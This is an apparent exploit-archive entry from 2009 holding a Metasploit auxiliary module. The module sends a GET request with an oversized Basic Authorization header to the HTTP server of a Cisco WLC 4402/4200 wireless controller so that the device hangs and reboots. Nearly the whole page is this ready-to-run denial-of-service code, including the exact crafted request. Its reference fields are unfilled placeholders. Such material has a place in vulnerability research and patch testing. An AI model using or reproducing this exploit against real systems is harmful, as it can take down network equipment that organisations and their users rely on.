Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)

2009-07-27T00:00:00
ID 1337DAY-ID-6942
Type zdt
Reporter Christoph Bott
Modified 2009-07-27T00:00:00

Description

Exploit for hardware platform in category dos / poc

                                        
                                            =========================================================
Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)
=========================================================


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Tcp
        include Msf::Auxiliary::Dos

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Cisco WLC 4200 Basic Auth Denial of Service',
                        'Description'    => %q{

                                This module triggers a Denial of Service condition in the Cisco WLC 4200
                                HTTP server. By sending a GET request with long authentication data, the
                                device becomes unresponsive and reboots.  Firmware is reportedly vulnerable.
                        },
                        'Author'                => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 5949 $',
                        'References'     =>
                                [
                                        [ 'BID', '???'],
                                        [ 'CVE', '???'],
                                        [ 'URL', 'http://www.cisco.com/?????'],
                                ],
                        'DisclosureDate' => 'January 26 2009'))

                register_options(
                        [
                                Opt::RPORT(80),
                        ], self.class)

        end

        def run
                connect

                print_status("Sending HTTP DoS packet")

                sploit =
                        "GET /screens/frameset.html HTTP/1.0\r\n" +
                        "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"

                sock.put(sploit + "\r\n")

                disconnect
        end

end




#  0day.today [2018-04-06]  #